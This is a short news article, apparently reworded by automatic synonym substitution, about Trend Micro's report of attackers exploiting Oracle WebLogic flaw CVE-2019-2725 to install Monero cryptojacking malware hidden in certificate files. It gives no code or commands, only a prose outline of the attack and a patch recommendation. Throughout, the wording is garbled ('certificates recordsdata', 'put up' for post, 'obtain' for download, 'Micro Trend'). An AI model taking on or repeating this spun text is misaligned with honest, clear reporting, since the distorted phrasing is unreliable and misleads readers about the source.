Cybersecurity agency Trend Micro has confirmed that attackers have been exploiting a vulnerability within the Oracle WebLogic server to set up monero (XMR) mining malware, whereas utilizing certificates recordsdata as an obfuscation trick. The information was revealed in a Trend Micro blog post printed on June 10.
As beforehand reported, types of stealth crypto mining are additionally referred to with the business time period cryptojacking — the apply of putting in malware that makes use of a pc’s processing energy to mine for cryptocurrencies with out the proprietor’s consent or data.
According to Trend Micro’s put up, a safety patch for theOracle WebLogic vulnerability (“CVE-2019-2725”) — reportedly brought on by a deserialization error — was released within the nationwide vulnerability database earlier this spring.
However, Trend Micro cites reports that emerged on the SANS ISC InfoSec discussion board alleging that the vulnerability has already been exploited for cryptojacking functions, and confirms that it has verified and analyzed the allegations.
The agency notes that the recognized assaults deployed what it describes as “an interesting twist” — specifically that “the malware hides its malicious codes in certificate files as an obfuscation tactic”:
“The idea of using certificate files to hide malware is not a new one […] By using certificate files for obfuscation purposes, a piece of malware can possibly evade detection since the downloaded file is in a certificate file format which is seen as normal -— especially when establishing HTTPS connections.”
Trend Micro’s evaluation begins by noting that the malware exploits CVE-2019-2725 to execute a PowerShell command, prompting the obtain of a certificates file from the command-and-control server.
After persevering with to hint its steps and traits — together with the set up of the XMR miner payload — Micro Trend notes an obvious anomaly in its present deployment:
“[O]ddly enough, upon execution of the PS command from the decoded certificate file, other malicious files are downloaded without being hidden via the certificate file format mentioned earlier. This might indicate that the obfuscation method is currently being tested for its effectiveness, with its expansion to other malware variants pegged at a later date.”
The put up concludes with a suggestion to corporations utilizing WebLogic Server to replace their software program to the newest model with the safety patch so as to mitigate the chance of cryptojacking.
As lately reported, Trend Micro detected a significant uptick in XMR cryptojacking concentrating on China-based techniques this spring, in a marketing campaign mimicking earlier actions that had used an obfuscated PowerShell script to ship XMR-mining malware.